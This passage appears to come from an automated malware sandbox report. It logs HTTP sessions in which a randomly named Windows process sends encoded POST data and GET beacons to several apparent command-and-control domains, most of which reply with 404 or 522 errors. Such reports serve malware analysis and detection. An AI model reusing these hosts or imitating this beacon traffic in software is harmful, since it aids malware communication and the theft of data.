                                                                               5 | 192.168.2.8 | 49715 | 172.67.138.138 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               Jan 10, 2025 18:54:27.376734972 CET | 737 | OUT | POST /wmxx/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 207
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.vietnamtour.pro
                                                                              Origin: http://www.vietnamtour.pro
                                                                              Referer: http://www.vietnamtour.pro/wmxx/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 2b 66 78 6a 68 32 33 59 58 63 79 45 6d 66 53 72 69 2b 32 45 54 6b 4b 41 6f 52 42 2f 77 74 33 68 66 56 39 71 33 77 77 56 72 2f 6f 4d 77 66 32 46 56 71 68 57 74 69 6e 4a 65 39 78 51 4e 4c 35 4a 78 2f 78 51 31 78 63 75 51 51 71 57 4d 47 44 59 61 30 62 56 72 66 30 6d 61 43 58 51 62 68 49 52 6e 78 50 35 4d 4c 6d 58 39 51 32 56 30 32 34 73 32 75 42 30 6f 6a 53 6c 54 43 34 58 4c 4d 4a 5a 55 33 32 35 71 4f 4a 73 6a 70 57 56 63 39 62 77 56 70 62 49 42 78 39 31 47 5a 72 62 36 74 39 42 47 45 58 70 43 6c 47 50 42 6a 39 45 4a 49 6b 74 53 4a 52 53 78 79 46 72 52 30 37 7a 6f 67 62 79 57 6b 35 69 72 4b 67 3d
                                                                              Data Ascii: irCxl6=+fxjh23YXcyEmfSri+2ETkKAoRB/wt3hfV9q3wwVr/oMwf2FVqhWtinJe9xQNL5Jx/xQ1xcuQQqWMGDYa0bVrf0maCXQbhIRnxP5MLmX9Q2V024s2uB0ojSlTC4XLMJZU325qOJsjpWVc9bwVpbIBx91GZrb6t9BGEXpClGPBj9EJIktSJRSxyFrR07zogbyWk5irKg=


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               6 | 192.168.2.8 | 49718 | 172.67.138.138 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               Jan 10, 2025 18:54:29.929508924 CET | 757 | OUT | POST /wmxx/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 227
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.vietnamtour.pro
                                                                              Origin: http://www.vietnamtour.pro
                                                                              Referer: http://www.vietnamtour.pro/wmxx/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 2b 66 78 6a 68 32 33 59 58 63 79 45 6d 38 4b 72 68 66 32 45 55 45 4b 48 6b 78 42 2f 35 4e 33 6c 66 56 42 71 33 31 55 46 72 4d 4d 4d 70 39 75 46 55 72 68 57 67 43 6e 4a 4b 74 78 56 53 62 35 43 78 2f 38 6a 31 7a 59 75 51 55 43 57 4d 48 7a 59 61 46 62 57 35 2f 30 65 52 69 58 65 57 42 49 52 6e 78 50 35 4d 49 62 38 39 51 2b 56 31 48 49 73 33 50 42 72 6b 44 53 6b 46 53 34 58 63 38 4a 64 55 33 32 62 71 4c 70 4b 6a 71 75 56 63 2f 7a 77 56 34 62 48 49 78 38 2b 4a 35 72 4a 37 38 45 6b 4d 6c 54 53 4c 55 2b 42 43 69 39 5a 49 2b 56 48 49 72 5a 55 79 79 74 41 52 33 54 46 74 58 47 61 4d 48 70 53 31 64 30 6b 45 75 75 6a 69 31 30 6c 4e 4b 63 2f 69 55 64 4f 58 79 57 77
                                                                              Data Ascii: irCxl6=+fxjh23YXcyEm8Krhf2EUEKHkxB/5N3lfVBq31UFrMMMp9uFUrhWgCnJKtxVSb5Cx/8j1zYuQUCWMHzYaFbW5/0eRiXeWBIRnxP5MIb89Q+V1HIs3PBrkDSkFS4Xc8JdU32bqLpKjquVc/zwV4bHIx8+J5rJ78EkMlTSLU+BCi9ZI+VHIrZUyytAR3TFtXGaMHpS1d0kEuuji10lNKc/iUdOXyWw


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               7 | 192.168.2.8 | 49719 | 172.67.138.138 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               Jan 10, 2025 18:54:32.479824066 CET | 1774 | OUT | POST /wmxx/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 1243
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.vietnamtour.pro
                                                                              Origin: http://www.vietnamtour.pro
                                                                              Referer: http://www.vietnamtour.pro/wmxx/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 2b 66 78 6a 68 32 33 59 58 63 79 45 6d 38 4b 72 68 66 32 45 55 45 4b 48 6b 78 42 2f 35 4e 33 6c 66 56 42 71 33 31 55 46 72 4d 45 4d 70 75 6d 46 56 49 5a 57 68 43 6e 4a 57 64 78 55 53 62 35 66 78 2f 6b 76 31 7a 46 5a 51 53 47 57 4d 68 6e 59 54 58 7a 57 67 50 30 65 4d 79 58 66 62 68 49 45 6e 78 65 77 4d 49 4c 38 39 51 2b 56 31 46 51 73 77 65 42 72 6d 44 53 6c 54 43 34 62 4c 4d 4a 31 55 7a 61 68 71 4c 6b 78 6a 61 4f 56 63 66 6a 77 47 2b 50 48 4a 52 38 38 49 35 71 61 37 39 34 33 4d 6c 66 65 4c 55 62 71 43 6c 78 5a 4b 37 67 4b 54 34 4a 69 6f 55 78 4b 58 48 54 74 6c 6e 4f 34 4c 6c 31 78 39 74 6b 48 4e 61 43 6f 6f 47 77 53 4e 4c 5a 30 2f 77 38 59 61 79 44 59 6c 64 2f 4c 51 6a 61 6a 78 45 37 38 71 39 2f 5a 44 66 46 46 71 79 4f 69 77 76 74 35 36 50 68 76 4f 54 4a 69 68 46 52 51 2f 48 6f 54 64 4b 51 6e 4a 4c 66 4b 6d 4f 34 39 42 76 44 50 4c 32 53 36 34 53 47 52 59 42 34 56 64 35 36 67 33 4b 78 42 4f 57 75 36 57 59 4a 6b 7a 76 35 33 51 4d 39 6d 53 58 56 52 6f 2b 49 31 59 47 49 77 38 6c 6f [TRUNCATED]
                                                                              Data Ascii: irCxl6=+fxjh23YXcyEm8Krhf2EUEKHkxB/5N3lfVBq31UFrMEMpumFVIZWhCnJWdxUSb5fx/kv1zFZQSGWMhnYTXzWgP0eMyXfbhIEnxewMIL89Q+V1FQsweBrmDSlTC4bLMJ1UzahqLkxjaOVcfjwG+PHJR88I5qa7943MlfeLUbqClxZK7gKT4JioUxKXHTtlnO4Ll1x9tkHNaCooGwSNLZ0/w8YayDYld/LQjajxE78q9/ZDfFFqyOiwvt56PhvOTJihFRQ/HoTdKQnJLfKmO49BvDPL2S64SGRYB4Vd56g3KxBOWu6WYJkzv53QM9mSXVRo+I1YGIw8loZMzFzvLOSYkntq3Pd/L8cf36ovY9qYryC5yCLqUQmzFNo7k6dMxiPQI9Y8LVHXlIY7Pgt/C8dLcH5zAg6VmaXoJ9X0YAEPeOw/qEXHrHFQ0SYIjkd+oGAN0+5Ij7aqgRcYzDmTzkTzaTQSViLVd6CpnMHrVfgT3RXnkJehEEBzAwqo0S7QvCq1DR5m0SAJQ/Dl6VJwq44ZOQoKi7Q7uaIp3wD5p3XRiEbgIZwrdoDINF0PWj6f1a/9RuzzRg1WHsmc+q595u9H/LFdHcURD5LxoIymqYymYq6UlJvWxSH9XhYZ5mU0VGlUUxoK+fHl2+JULaCIexaB1u7rTToWUQPncnExNLWYsFd4B13U0BcovCGTn90eQPjrIV5lc+KTtAaTr9kEco9/Fqph+mkt6SGED77xOlPXZWNcoVoAQv3n18oUsrRqU+YhsBgIDYhds6BMoOLf53MTewYsb47tNdg6PL6Qow0hyAKboLTWjjIcpSPbrGdXE0vkKppq1KZ4lzykn10SXpf3FwPx2jLXkucG1X3eAW3RcBzDVWwrdyrjMzwAjr/9PyLnQGP2WUHECBqMdtiZlwXp/aMUkkL+4WENHLEbr1D/eqVC6pkS2YnGtEJs32no2eGGVhey+YLqm8VjlRl480qaalJM3sjrfE6vD0yOc+8rYNL2 [TRUNCATED]


                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                               8 | 192.168.2.8 | 49720 | 172.67.138.138 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                               Jan 10, 2025 18:54:35.017736912 CET | 471 | OUT | GET /wmxx/?0FJ=D00hHLh&irCxl6=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ+O4VSQPSXkwvnSmJEYaf1BK13FkupONapGDJTjw9KvkhIA== HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.vietnamtour.pro
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                               Jan 10, 2025 18:55:14.926848888 CET | 968 | IN | HTTP/1.1 522
                                                                              Date: Fri, 10 Jan 2025 17:55:14 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 15
                                                                              Connection: close
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z0YOPKzhNT4szNftQJsAZVquo287abPMqG%2F2D4qgb%2FmvKvOq4dWS61ilwyOu1GRaHE%2Bi%2BcY7FEV1k%2FRyWxsx3P6xxx%2FprC4YJ7OBlG%2BapuO1pMJN5R2lhuOcb3U5e6xwj3DAMoxU"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Referrer-Policy: same-origin
                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffe887c8e690f83-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=74163&min_rtt=74163&rtt_var=37081&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=471&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: error code: 522


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49721 | 69.57.163.64 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:55:20.207743883 CET | 743 | OUT | POST /zbqa/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
Connection: close
Host: www.showyourstyle.top
Origin: http://www.showyourstyle.top
Referer: http://www.showyourstyle.top/zbqa/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Data Ascii: irCxl6=YJXb98DVW6x1mvrgXohNrY18FBTzXwaW4syqcx+jpYV2LFb0tYrOfvwzjbATr6af9dKccINTo8Yep8hxVGBHug5UyK9GAAoeI6LP24BjESheXGotRba61VVNgMfPmQgX24JvJMbhVF6h897+2k2aiuN3Szva5bRboBByKCYvrM5JH62uvoNkwTz3fnBGa6XqZBo6e+M=
Jan 10, 2025 18:55:20.841234922 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 17:55:20 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49722 | 69.57.163.64 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:55:22.757997036 CET | 763 | OUT | POST /zbqa/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
Connection: close
Host: www.showyourstyle.top
Origin: http://www.showyourstyle.top
Referer: http://www.showyourstyle.top/zbqa/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Data Ascii: irCxl6=YJXb98DVW6x1mPbgVP1N6417ABTzYQaS4s+qcw6zqqh2LkL0uZrOP/wz3LAWoKau9d2UcMRTo8cep4lxVXBE8A5Wna8gfQoeI6LP24kOES5eXyUtR6a581VCnMfP3AgM24JNJNWpVGSh88L+2xaZ3+N9WzudwIkEnAMQGgNPy+kzGMHE1KFizTbcfkpwfNKCDi4KApYS56j244n5ryRcv3m+tmqj
Jan 10, 2025 18:55:23.387659073 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 17:55:23 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49723 | 69.57.163.64 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:55:25.308222055 CET | 1780 | OUT | POST /zbqa/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Length: 1243
Content-Type: application/x-www-form-urlencoded
Connection: close
Host: www.showyourstyle.top
Origin: http://www.showyourstyle.top
Referer: http://www.showyourstyle.top/zbqa/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Data Ascii: irCxl6= [TRUNCATED]
Jan 10, 2025 18:55:25.919161081 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 17:55:25 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49724 | 69.57.163.64 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:55:27.850214958 CET | 473 | OUT | GET /zbqa/?irCxl6=VL/7+LncUKg93smxMKx16PJyQUb9eyDUwLSrEzeHp8x1IkOi8uzSCeY3r5BUse/S3M+vRdZQg/I11o5hNVVA7SQLtfVsXWgzAL3L+IJqGxdPdltrLo2WzEd+oOLSgjkcqA==&0FJ=D00hHLh HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Connection: close
Host: www.showyourstyle.top
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Jan 10, 2025 18:55:28.457796097 CET | 548 | IN | HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 17:55:28 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49725 | 101.32.205.61 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:55:34.255475044 CET | 728 | OUT | POST /gtil/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
Connection: close
Host: www.rwse6wjx.sbs
Origin: http://www.rwse6wjx.sbs
Referer: http://www.rwse6wjx.sbs/gtil/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Data Ascii: irCxl6=/wBbw28ri3wrEbH7m01t66kwnYPYF3H9l7a5rZvGlh6/jTipMGx5ojzRtTIZSI71EXKug0FQBRsdWWjtgggek0wyrsuYW/H9GVRjyai+wEQoapFFM+bmm8kSIajajgVP00yzPVRo5LmJvRvX0ckd+HZDAhUTwfHsdijir56wYjsRAYXP6b9PK1L20/oXdoKsasZ3CTo=
Jan 10, 2025 18:55:35.243802071 CET | 306 | IN | HTTP/1.1 404 Not Found
Server: Tengine
Date: Fri, 10 Jan 2025 17:55:35 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49726 | 101.32.205.61 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:55:36.808756113 CET | 748 | OUT | POST /gtil/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
Connection: close
Host: www.rwse6wjx.sbs
Origin: http://www.rwse6wjx.sbs
Referer: http://www.rwse6wjx.sbs/gtil/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Data Ascii: irCxl6=/wBbw28ri3wrE737gXdtz6kvo4PYPXH5l7G5rYrolTe/jySpPFp5pjzR1DIcdo78EX3Tg1pQBR4dWU7tgTIZ+Ew0mMuebfH9GVRjyaHZwHgoaY1FNbnlvckRPaja1QVL00yrPUdG5JuJvQfX0Nke0HZFNBV42+mIXCCNuaiQa1goMOmlg51JJ1jd08AhYfXEAPJHcE+hmRMxXAxfOPqkJ0EgTm3+
Jan 10, 2025 18:55:37.683824062 CET | 306 | IN | HTTP/1.1 404 Not Found
Server: Tengine
Date: Fri, 10 Jan 2025 17:55:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49727 | 101.32.205.61 | 80 | 5180 | C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 18:55:39.352354050 CET | 1765 | OUT | POST /gtil/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Length: 1243
Content-Type: application/x-www-form-urlencoded
Connection: close
Host: www.rwse6wjx.sbs
Origin: http://www.rwse6wjx.sbs
Referer: http://www.rwse6wjx.sbs/gtil/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Data Ascii: irCxl6= [TRUNCATED]
Jan 10, 2025 18:55:40.303808928 CET | 306 | IN | HTTP/1.1 404 Not Found
Server: Tengine
Date: Fri, 10 Jan 2025 17:55:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 16
Source IP: 192.168.2.8
Source Port: 49728
Destination IP: 101.32.205.61
Destination Port: 80
PID: 5180
Process: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe

Timestamp: Jan 10, 2025 18:55:41.909040928 CET
Bytes transferred: 468
Direction: OUT
Data:
GET /gtil/?0FJ=D00hHLh&irCxl6=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/43E9pOq5Y7bgQWtruYXflXEVT6YhdPLVpdYAFb3D0RMErQ== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Connection: close
Host: www.rwse6wjx.sbs
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko

Timestamp: Jan 10, 2025 18:55:42.895385027 CET
Bytes transferred: 306
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: Tengine
Date: Fri, 10 Jan 2025 17:55:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 17
Source IP: 192.168.2.8
Source Port: 49729
Destination IP: 103.159.36.66
Destination Port: 80
PID: 5180
Process: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe

Timestamp: Jan 10, 2025 18:55:48.595082045 CET
Bytes transferred: 746
Direction: OUT
Data:
POST /nfd2/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
Connection: close
Host: www.rokeyfashion.store
Origin: http://www.rokeyfashion.store
Referer: http://www.rokeyfashion.store/nfd2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Data Ascii: irCxl6=AxQySsSYfODWpqLSDlQMd6rtRwtzShXi3/hseZz+zmG+mUNSCMOdprNItyNlcYLxeLVmSeD9Em5lWC6VrnlZfqcUi5gHNPDXjPpMyClhgBv5N83lCPcbEEo1uPqrwmKkowv2pQ2/mhAzHrmS9C5FtTFK13g1+TGfSC6xslKYg9VdNu4YA1bvFZAFHXbw1jKfhH7Q8vk=


Session ID: 18
Source IP: 192.168.2.8
Source Port: 49730
Destination IP: 103.159.36.66
Destination Port: 80
PID: 5180
Process: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe

Timestamp: Jan 10, 2025 18:55:51.151169062 CET
Bytes transferred: 766
Direction: OUT
Data:
POST /nfd2/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
Connection: close
Host: www.rokeyfashion.store
Origin: http://www.rokeyfashion.store
Referer: http://www.rokeyfashion.store/nfd2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Data Ascii: irCxl6=AxQySsSYfODWv5jSPkQMV6rsVAtzYBXm3/tsebfuwVu+m2VSBNOdurNI5CMvR4LAeLpUSeP9EmdlWHeVrw5ae6cWqZgBVvDXjPpMyChHgBX5NMnlBucUaUoynvqr9GKgowuTpUvkmnEzHuaS8T5a4DFMonhE7hbzUi/WxDCUgdJhIYJyaXTpGZouHUzGwUX37krgi4z5W4hgY6Axcaz/SM1jcBm+


Session ID: 19
Source IP: 192.168.2.8
Source Port: 49731
Destination IP: 103.159.36.66
Destination Port: 80
PID: 5180
Process: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe

Timestamp: Jan 10, 2025 18:55:53.696706057 CET
Bytes transferred: 1783
Direction: OUT
Data:
POST /nfd2/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Length: 1243
Content-Type: application/x-www-form-urlencoded
Connection: close
Host: www.rokeyfashion.store
Origin: http://www.rokeyfashion.store
Referer: http://www.rokeyfashion.store/nfd2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
Data Ascii: irCxl6=[TRUNCATED]


Session ID: 20
Source IP: 192.168.2.8
Source Port: 49732
Destination IP: 103.159.36.66
Destination Port: 80
PID: 5180
Process: C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe

Timestamp: Jan 10, 2025 18:55:56.237102032 CET
Bytes transferred: 474
Direction: OUT
Data:
GET /nfd2/?irCxl6=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZB5AOjp44EvTwqJF0vghgjnDPOb2iH8sdTWQtstyoz2bs+w==&0FJ=D00hHLh HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
